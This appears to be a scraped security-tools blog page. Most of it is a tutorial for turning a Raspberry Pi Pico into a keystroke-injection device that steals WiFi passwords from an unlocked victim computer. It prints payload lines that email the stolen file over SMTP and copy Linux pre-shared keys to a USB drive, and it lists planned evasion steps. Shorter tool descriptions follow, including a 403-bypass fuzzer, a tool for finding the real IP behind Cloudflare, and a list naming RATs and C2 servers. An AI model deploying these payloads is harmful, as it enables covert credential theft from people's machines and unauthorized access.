Have you ever watched a film where a hacker plugs a seemingly ordinary USB drive into a victim's computer and steals data from it? - A proper wet dream for some.

    Disclaimer: All content in this project is intended for security research purpose only.


    Introduction

    During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

    Setup

    After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

    Prerequisites

    • Physical access to victim's computer.

    • Unlocked victim's computer.

• Victim's computer has to have internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

    • Knowledge of victim's computer password for the Linux exploit.

    Requirements - What you'll need


    • Raspberry Pi Pico (RPi Pico)
    • Micro USB to USB Cable
    • Jumper Wire (optional)
    • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
    • USB flash drive (for the exploit over physical medium only)


    Note:

• It is possible to build this tool using a Rubber Ducky, but keep in mind that an RPi Pico costs about $4.00 while a Rubber Ducky costs $80.00.

• However, while pico-ducky is a good and budget-friendly solution, Rubber Ducky does offer things like stealthiness and usage of the latest DuckyScript version.

• In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

    Keystroke injection tool

A keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

    Keystroke injection

The payload uses the STRING command to process keystrokes for injection. It accepts one or more alphanumeric/punctuation characters and types the remainder of the line exactly as-is into the target machine. The ENTER/SPACE commands simulate presses of those keyboard keys.

    Delays

We use the DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a command line to load. A delay is especially useful at the very beginning, when a new USB device is connected to a targeted computer: the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs, setup time is very short; in most cases it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

    Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, the adversary can package it to avoid detection while sending it over the network, using encryption or compression. The two most common ways of exfiltration are:

    • Exfiltration over the network medium.
      • This approach was used for the Windows exploit. The whole payload can be seen here.

    • Exfiltration over a physical medium.
      • This approach was used for the Linux exploit. The whole payload can be seen here.

    Windows exploit

    In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

    Sending stolen data over email

Once passwords have been exported to the .txt file, the payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit the following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and your email PASSWORD. In addition, you could also update the body and the subject of the email.

    STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

     Note:

    • After sending data over the email, the .txt file is deleted.

• You can also use an SMTP server from another email provider, but you should be mindful of the SMTP server and port number you write in the payload.

    • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

    Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 to comply with the code in code.py on your RPi Pico. For more information about how to set up multiple payloads on your RPi Pico visit this link.

    Storing stolen data to USB flash drive

    Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

    STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

    STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

    In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

    STRING echo PASSWORD | sudo -S echo

    STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

    Bash script

    In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

    echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

    where PASSWORD is your account's password and USBSTICK is the name for your USB device.

    Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. The keyfile plugin uses an .ini-style keyfile format to store network configuration profiles; it supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract the data of interest. For file filtering, a positive lookbehind assertion was used ((?<=keyword)). The positive lookbehind assertion matches at a position right after the keyword without making that text itself part of the match, so the regex (?<=keyword).* matches any text after the keyword. This allows the payload to match the values after the ssid and psk (pre-shared key) keywords.
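The same lookbehind is easy to try interactively; here it is in Python's re module against a keyfile-style snippet (grep -oP uses the identical PCRE syntax, so the patterns carry over unchanged):

import re

keyfile = """[wifi]
ssid=HomeWiFi
[wifi-security]
psk=SuperSecret1
"""

# (?<=keyword) anchors right after the keyword without consuming it,
# so only the value ends up in the match
print(re.findall(r"(?<=ssid=).*", keyfile))  # ['HomeWiFi']
print(re.findall(r"(?<=psk=).*", keyfile))   # ['SuperSecret1']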

For more information about NetworkManager, here are some useful links:

    Exfiltrated data formatting

    Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

    Wireless_Network_Name Password
    --------------------- --------
    WLAN1 pass1
    WLAN2 pass2
    WLAN3 pass3

    USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over the RPi Pico is that it doesn't show up as a USB mass storage device once plugged in; the machine sees it only as a USB keyboard. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

πŸ’‘ Tip:

    • Upload your payload to RPi Pico before you connect the pins.
    • Don't solder the pins because you will probably want to change/update the payload at some point.

    Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, the name of the OS (windows or linux) and the name of the payload file (e.g. payload1.dd). Below you can find an example of how to run the writer script when creating a Windows payload.

    python3 writer.py windows payload1.dd

    Limitations/Drawbacks

    • This pico-ducky currently works only on Windows OS.

    • This attack requires physical access to an unlocked device in order to be successfully deployed.

• The Linux exploit is far less likely to be successful because, in order to succeed, you not only need physical access to an unlocked device, you also need to know the admin's password for the Linux machine.

    • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

    • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

• The pico-ducky device isn't really stealthy; quite the opposite, it's really bulky, especially if you solder the pins.

    • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

    • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

    • If the computer has a non-English Environment set, this exploit won't be successful.

    • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

    To-Do List

    • Fix Caps Lock bug.
    • Fix non-English Environment bug.
    • Obfuscate the command prompt.
    • Implement exfiltration over a physical medium.
    • Create a payload for Linux.
    • Encode/Encrypt exfiltrated data before sending it over email.
    • Implement indicator of successfully completed exploit.
    • Implement command history clean-up for Linux exploit.
    • Enhance the Linux exploit in order to avoid usage of sudo.


    Top 20 Most Popular Hacking Tools in 2023

    By: Zion3R

As we did last year, we have made a ranking of the most popular tools between January and December 2023.

    The tools of this year encompass a diverse range of cybersecurity disciplines, including AI-Enhanced Penetration Testing, Advanced Vulnerability Management, Stealth Communication Techniques, Open-Source General Purpose Vulnerability Scanning, and more.

    Without going into further details, we have prepared a useful list of the most popular tools in Kitploit 2023:


    1. PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session


    2. Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


    3. Faraday - Open Source Vulnerability Management Platform


    4. CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare


    5. Killer - Is A Tool Created To Evade AVs And EDRs Or Security Tools


    6. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases


    7. Waf-Bypass - Check Your WAF Before An Attacker Does


    8. PentestGPT - A GPT-empowered Penetration Testing Tool


    9. Sirius - First Truly Open-Source General Purpose Vulnerability Scanner


    10. LSMS - Linux Security And Monitoring Scripts


    11. GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM


    12. Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403


    13. ThunderCloud - Cloud Exploit Framework


    14. GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


    15. Kscan - Simple Asset Mapping Tool


    16. RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry


    17. DNSWatch - DNS Traffic Sniffer and Analyzer


    18. IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File


    19. TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions


    20. XSS-Exploitation-Tool - An XSS Exploitation Tool





The KitPloit team wishes you a Happy New Year!


    PipeViewer - A Tool That Shows Detailed Information About Named Pipes In Windows

    By: Zion3R


    A GUI tool for viewing Windows Named Pipes and searching for insecure permissions.

    The tool was published as part of a research about Docker named pipes:
    "Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 1"
    "Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 2"

    Overview

    PipeViewer is a GUI tool that allows users to view details about Windows Named pipes and their permissions. It is designed to be useful for security researchers who are interested in searching for named pipes with weak permissions or testing the security of named pipes. With PipeViewer, users can easily view and analyze information about named pipes on their systems, helping them to identify potential security vulnerabilities and take appropriate steps to secure their systems.
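For context, the enumeration itself is conceptually simple: Windows exposes live named pipes under \\.\pipe\, so they can be listed from almost any language. Below is a minimal sketch in Python, purely to illustrate the concept; PipeViewer's actual implementation is C# on top of NtApiDotNet:

# Minimal sketch: list Windows named pipes (Windows only).
# PipeViewer itself uses NtApiDotNet; this only illustrates the concept.
import os

for name in os.listdir(r"\\.\pipe\\"):
    print(name)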


    Usage

    Double-click the EXE binary and you will get the list of all named pipes.

    Build

    We used Visual Studio to compile it.
When downloading it from GitHub you might get errors about blocked files; you can use PowerShell to unblock them:

    Get-ChildItem -Path 'D:\tmp\PipeViewer-main' -Recurse | Unblock-File

    Warning

We built the project and uploaded it, so you can find it in the releases.
One problem is that the binary will trigger alerts from Windows Defender because it uses the NtObjectManager package, which is flagged as a virus.
Note that James Forshaw talked about it here.
We can't change this because we depend on a third-party DLL.

    Features

    • A detailed overview of named pipes.
    • Filter\highlight rows based on cells.
    • Bold specific rows.
    • Export\Import to\from JSON.
    • PipeChat - create a connection with available named pipes.

    Demo

    PipeViewer3_v1.0.mp4

    Credit

    We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get information about named pipes.

    License

    Copyright (c) 2023 CyberArk Software Ltd. All rights reserved
    This repository is licensed under Apache-2.0 License - see LICENSE for more details.

    References

    For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.



    MacMaster - MAC Address Changer

    By: Zion3R


    MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.

    Features

    • Custom MAC Address: Set a specific MAC address to your network interface.
    • Random MAC Address: Generate and set a random MAC address.
    • Reset to Original: Reset the MAC address to its original hardware value.
    • Custom OUI: Set a custom Organizationally Unique Identifier (OUI) for the MAC address.
    • Version Information: Easily check the version of MacMaster you are using.

    Installation

    MacMaster requires Python 3.6 or later.

    1. Clone the repository:
      $ git clone https://github.com/HalilDeniz/MacMaster.git
    2. Navigate to the cloned directory:
  $ cd MacMaster
    3. Install the package:
      $ python setup.py install

    Usage

    $ macmaster --help         
    usage: macmaster [-h] [--interface INTERFACE] [--version]
    [--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]

    MacMaster: Mac Address Changer

    options:
    -h, --help show this help message and exit
    --interface INTERFACE, -i INTERFACE
    Network interface to change MAC address
    --version, -V Show the version of the program
    --random, -r Set a random MAC address
    --newmac NEWMAC, -nm NEWMAC
    Set a specific MAC address
    --customoui CUSTOMOUI, -co CUSTOMOUI
    Set a custom OUI for the MAC address
    --reset, -rs Reset MAC address to the original value

    Arguments

    • --interface, -i: Specify the network interface.
    • --random, -r: Set a random MAC address.
    • --newmac, -nm: Set a specific MAC address.
    • --customoui, -co: Set a custom OUI for the MAC address.
    • --reset, -rs: Reset MAC address to the original value.
    • --version, -V: Show the version of the program.
    1. Set a specific MAC address:
      $ macmaster.py -i eth0 -nm 00:11:22:33:44:55
    2. Set a random MAC address:
      $ macmaster.py -i eth0 -r
    3. Reset MAC address to its original value:
      $ macmaster.py -i eth0 -rs
    4. Set a custom OUI:
      $ macmaster.py -i eth0 -co 08:00:27
    5. Show program version:
      $ macmaster.py -V

    Replace eth0 with your desired network interface.

    Note

    You must run this script as root or use sudo to run this script for it to work properly. This is because changing a MAC address requires root privileges.
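For the curious, changing a MAC address on Linux usually boils down to a couple of iproute2 calls plus a correctly formed random address. A minimal sketch, assuming the ip utility is available (illustrative only, not MacMaster's actual code):

# Minimal sketch of what a MAC changer does under the hood on Linux
# (illustrative; MacMaster's actual implementation may differ).
# Requires root and the iproute2 "ip" utility.
import random
import subprocess

def random_mac():
    # First octet: clear the multicast bit, set the locally administered bit.
    first = (random.randint(0x00, 0xFF) & 0b11111100) | 0b00000010
    rest = [random.randint(0x00, 0xFF) for _ in range(5)]
    return ":".join(f"{b:02x}" for b in [first] + rest)

def set_mac(interface, mac):
    subprocess.run(["ip", "link", "set", "dev", interface, "down"], check=True)
    subprocess.run(["ip", "link", "set", "dev", interface, "address", mac], check=True)
    subprocess.run(["ip", "link", "set", "dev", interface, "up"], check=True)

# set_mac("eth0", random_mac())

Note the first-octet manipulation: clearing bit 0 keeps the address unicast, and setting bit 1 marks it as locally administered, which is what well-behaved MAC changers generate.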

    Contributing

    Contributions are welcome! To contribute to MacMaster, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact

    For any inquiries or further information, you can reach me through the following channels:

    Contact



    NetProbe - Network Probe

    By: Zion3R


    NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.
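A minimal sketch of this kind of ARP scan with scapy (illustrative only, not NetProbe's actual code; requires root privileges):

# Minimal sketch of an ARP scan like the one NetProbe performs.
from scapy.all import ARP, Ether, srp

def arp_scan(subnet="192.168.1.0/24", timeout=2):
    # Broadcast an ARP "who-has" for every address in the subnet.
    packet = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=subnet)
    answered, _ = srp(packet, timeout=timeout, verbose=False)
    return [(rcv.psrc, rcv.hwsrc) for _, rcv in answered]

for ip, mac in arp_scan():
    print(f"{ip:15} {mac}")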

    Features

    • Scan for devices on a specified IP address or subnet
    • Display the IP address, MAC address, manufacturer, and device model of discovered devices
    • Live tracking of devices (optional)
    • Save scan results to a file (optional)
    • Filter by manufacturer (e.g., 'Apple') (optional)
    • Filter by IP range (e.g., '192.168.1.0/24') (optional)
    • Scan rate in seconds (default: 5) (optional)

    Download

    You can download the program from the GitHub page.

    $ git clone https://github.com/HalilDeniz/NetProbe.git

    Installation

    To install the required libraries, run the following command:

    $ pip install -r requirements.txt

    Usage

    To run the program, use the following command:

    $ python3 netprobe.py [-h] -t  [...] -i  [...] [-l] [-o] [-m] [-r] [-s]
    • -h,--help: show this help message and exit
    • -t,--target: Target IP address or subnet (default: 192.168.1.0/24)
    • -i,--interface: Interface to use (default: None)
    • -l,--live: Enable live tracking of devices
    • -o,--output: Output file to save the results
    • -m,--manufacturer: Filter by manufacturer (e.g., 'Apple')
    • -r,--ip-range: Filter by IP range (e.g., '192.168.1.0/24')
    • -s,--scan-rate: Scan rate in seconds (default: 5)

    Example:

    $ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

    Help Menu

    $ python3 netprobe.py --help                      
    usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]

    NetProbe: Network Scanner Tool

    options:
    -h, --help show this help message and exit
    -t [ ...], --target [ ...]
    Target IP address or subnet (default: 192.168.1.0/24)
    -i [ ...], --interface [ ...]
    Interface to use (default: None)
    -l, --live Enable live tracking of devices
    -o , --output Output file to save the results
    -m , --manufacturer Filter by manufacturer (e.g., 'Apple')
    -r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
    -s , --scan-rate Scan rate in seconds (default: 5)

    Default Scan

    $ python3 netprobe.py 

    Live Tracking

    You can enable live tracking of devices on your network by using the -l or --live flag. This will continuously update the device list every 5 seconds.

    $ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l

    Save Results

    You can save the scan results to a file by using the -o or --output flag followed by the desired output file name.

    $ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
    ┏━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
    ┃ IP Address   ┃ MAC Address       ┃ Packet Size ┃ Manufacturer                 ┃
    ┑━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
    β”‚ 192.168.1.1  β”‚ **:6e:**:97:**:28 β”‚ 102         β”‚ ASUSTek COMPUTER INC.        β”‚
    β”‚ 192.168.1.3  β”‚ 00:**:22:**:12:** β”‚ 102         β”‚ InPro Comm                   β”‚
    β”‚ 192.168.1.2  β”‚ **:32:**:bf:**:00 β”‚ 102         β”‚ Xiaomi Communications Co Ltd β”‚
    β”‚ 192.168.1.98 β”‚ d4:**:64:**:5c:** β”‚ 102         β”‚ ASUSTek COMPUTER INC.        β”‚
    β”‚ 192.168.1.25 β”‚ **:49:**:00:**:38 β”‚ 102         β”‚ Unknown                      β”‚
    β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
    

    Contact

    If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:

    License

    This program is released under the MIT LICENSE. See LICENSE for more information.



    CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare

    By: Zion3R


    CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.


    Key Features:

    • Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.

    • Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.

    • Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.

    • Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.

    With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.
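The core idea can be sketched in a few lines: resolve candidate subdomains and flag any that resolve outside Cloudflare's published ranges. The snippet below is a minimal illustration, not CloakQuest3r's actual code; the CIDR list is deliberately partial and example.com is a placeholder target:

# Minimal sketch of the subdomain-scanning idea behind CloakQuest3r.
import ipaddress
import socket

# Partial, illustrative list of Cloudflare ranges.
CLOUDFLARE_RANGES = [
    ipaddress.ip_network(cidr)
    for cidr in ("104.16.0.0/13", "172.64.0.0/13", "173.245.48.0/20")
]

def is_cloudflare(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CLOUDFLARE_RANGES)

for sub in ("www", "mail", "ftp", "dev", "staging"):
    host = f"{sub}.example.com"  # replace with the target domain
    try:
        ip = socket.gethostbyname(host)
    except socket.gaierror:
        continue
    if not is_cloudflare(ip):
        print(f"possible real IP: {host} -> {ip}")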

    Limitation

- Still in the development phase; sometimes it can't detect the real IP.

- CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.

1. False Negatives: CloakQuest3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.

2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.

3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the primary host. Some subdomains may also be protected by Cloudflare.

    This tool is a Proof of Concept and is for Educational Purposes Only.

    How to Use:

1. Run CloakQuest3r with a single command-line argument: the target domain you want to analyze.

       git clone https://github.com/spyboy-productions/CloakQuest3r.git
      cd CloakQuest3r
      pip3 install -r requirements.txt
      python cloakquest3r.py example.com
    2. The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.

3. If Cloudflare is detected, CloakQuest3r will scan for subdomains and identify their real IP addresses.

    4. You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.

    5. Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.

CloakQuest3r simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.

    Run It Online:

    Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r



    GISEC Armory Edition 1 Dubai 2024 – Call For Tools is Open

    We are excited to announce a groundbreaking partnership between ToolsWatch and GISEC 2024, as they

    Black Hat Arsenal 2024 Next Stop Singapore !

    Excitement is building in the cybersecurity community as the renowned Black Hat Arsenal gears up

    ICS-Forensics-Tools - Microsoft ICS Forensics Framework

    By: Zion3R


Microsoft ICS Forensics Tools is an open source forensic framework for analyzing industrial PLC metadata and project files.
It enables investigators to identify suspicious artifacts in ICS environments and to detect compromised devices during incident response or manual checks.
Being an open source framework, it allows investigators to verify the actions of the tool or customize it to specific needs.


    Getting Started

    These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

    git clone https://github.com/microsoft/ics-forensics-tools.git

    Prerequisites

    Installing

    • Install python requirements

      pip install -r requirements.txt

    Usage

    General application arguments:

    Args Description Required / Optional
    -h, --help show this help message and exit Optional
    -s, --save-config Save config file for easy future usage Optional
    -c, --config Config file path, default is config.json Optional
    -o, --output-dir Directory in which to output any generated files, default is output Optional
    -v, --verbose Log output to a file as well as the console Optional
    -p, --multiprocess Run in multiprocess mode by number of plugins/analyzers Optional

    Specific plugin arguments:

    Args Description Required / Optional
    -h, --help show this help message and exit Optional
--ip Addresses file path, CIDR or IP addresses csv (ip column required); add more columns for additional info about each ip (username, pass, etc...) Required
    --port Port number Optional
    --transport tcp/udp Optional
    --analyzer Analyzer name to run Optional

    Executing examples in the command line

python driver.py -s -v PluginName --ip ips.csv
python driver.py -s -v PluginName --analyzer AnalyzerName
python driver.py -s -v -c config.json --multiprocess

    Import as library example

from forensic.client.forensic_client import ForensicClient
from forensic.interfaces.plugin import PluginConfig

forensic = ForensicClient()
plugin = PluginConfig.from_json({
    "name": "PluginName",
    "port": 123,
    "transport": "tcp",
    "addresses": [{"ip": "192.168.1.0/24"}, {"ip": "10.10.10.10"}],
    "parameters": {},
    "analyzers": []
})
forensic.scan([plugin])

    Architecture

    Adding Plugins

    When developing locally make sure to mark src folder as "Sources root"

    • Create new directory under plugins folder with your plugin name
    • Create new Python file with your plugin name
    • Use the following template to write your plugin and replace 'General' with your plugin name
from pathlib import Path
from forensic.interfaces.plugin import PluginInterface, PluginConfig, PluginCLI
from forensic.common.constants.constants import Transport


class GeneralCLI(PluginCLI):
    def __init__(self, folder_name):
        super().__init__(folder_name)
        self.name = "General"
        self.description = "General Plugin Description"
        self.port = 123
        self.transport = Transport.TCP

    def flags(self, parser):
        self.base_flags(parser, self.port, self.transport)
        parser.add_argument('--general', help='General additional argument', metavar="")


class General(PluginInterface):
    def __init__(self, config: PluginConfig, output_dir: Path, verbose: bool):
        super().__init__(config, output_dir, verbose)

    def connect(self, address):
        self.logger.info(f"{self.config.name} connect")

    def export(self, extracted):
        self.logger.info(f"{self.config.name} export")
    • Make sure to import your new plugin in the __init__.py file under the plugins folder
    • In the PluginInterface inherited class there is 'config' parameters, you can use this to access any data that's available in the PluginConfig object (plugin name, addresses, port, transport, parameters).
      there are 2 mandatory functions (connect, export).
      the connect function receives single ip address and extracts any relevant information from the device and return it.
      the export function receives the information that was extracted from all the devices and there you can export it to file.
    • In the PluginCLI inherited class you need to specify in the init function the default information related to this plugin.
      there is a single mandatory function (flags).
      In which you must call base_flags, and you can add any additional flags that you want to have.

    Adding Analyzers

    • Create new directory under analyzers folder with the plugin name that related to your analyzer.
    • Create new Python file with your analyzer name
    • Use the following template to write your plugin and replace 'General' with your plugin name
from pathlib import Path
from forensic.interfaces.analyzer import AnalyzerInterface, AnalyzerConfig


class General(AnalyzerInterface):
    def __init__(self, config: AnalyzerConfig, output_dir: Path, verbose: bool):
        super().__init__(config, output_dir, verbose)
        self.plugin_name = 'General'
        self.create_output_dir(self.plugin_name)

    def analyze(self):
        pass
    • Make sure to import your new analyzer in the __init__.py file under the analyzers folder

    Resources and Technical data & solution:

    Microsoft Defender for IoT is an agentless network-layer security solution that allows organizations to continuously monitor and discover assets, detect threats, and manage vulnerabilities in their IoT/OT and Industrial Control Systems (ICS) devices, on-premises and in Azure-connected environments.

    Section 52 under MSRC blog
    ICS Lecture given about the tool
    Section 52 - Investigating Malicious Ladder Logic | Microsoft Defender for IoT Webinar - YouTube

    Contributing

    This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.

    When you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.

    This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments.

    Trademarks

    This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow Microsoft's Trademark & Brand Guidelines. Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos are subject to those third-party's policies.



    Forbidden-Buster - A Tool Designed To Automate Various Techniques In Order To Bypass HTTP 401 And 403 Response Codes And Gain Access To Unauthorized Areas In The System

    By: Zion3R


    Forbidden Buster is a tool designed to automate various techniques in order to bypass HTTP 401 and 403 response codes and gain access to unauthorized areas in the system. This code is made for security enthusiasts and professionals only. Use it at your own risk.

    • Probes HTTP 401 and 403 response codes to discover potential bypass techniques.
    • Utilizes various methods and headers to test and bypass access controls.
    • Customizable through command-line arguments.

    Install requirements

    pip3 install -r requirements.txt

    Run the script

    python3 forbidden_buster.py -u http://example.com

    Forbidden Buster accepts the following arguments:

      -h, --help            show this help message and exit
    -u URL, --url URL Full path to be used
    -m METHOD, --method METHOD
    Method to be used. Default is GET
    -H HEADER, --header HEADER
    Add a custom header
-d DATA, --data DATA Add data to request body. JSON is supported with escaping
    -p PROXY, --proxy PROXY
    Use Proxy
    --rate-limit RATE_LIMIT
    Rate limit (calls per second)
    --include-unicode Include Unicode fuzzing (stressful)
    --include-user-agent Include User-Agent fuzzing (stressful)

    Example Usage:

    python3 forbidden_buster.py --url "http://example.com/secret" --method POST --header "Authorization: Bearer XXX" --data '{\"key\":\"value\"}' --proxy "http://proxy.example.com" --rate-limit 5 --include-unicode --include-user-agent

    • Hacktricks - Special thanks for providing valuable techniques and insights used in this tool.
    • SecLists - Credit to danielmiessler's SecLists for providing the wordlists.
    • kaimi - Credit to kaimi's "Possible IP Bypass HTTP Headers" wordlist.


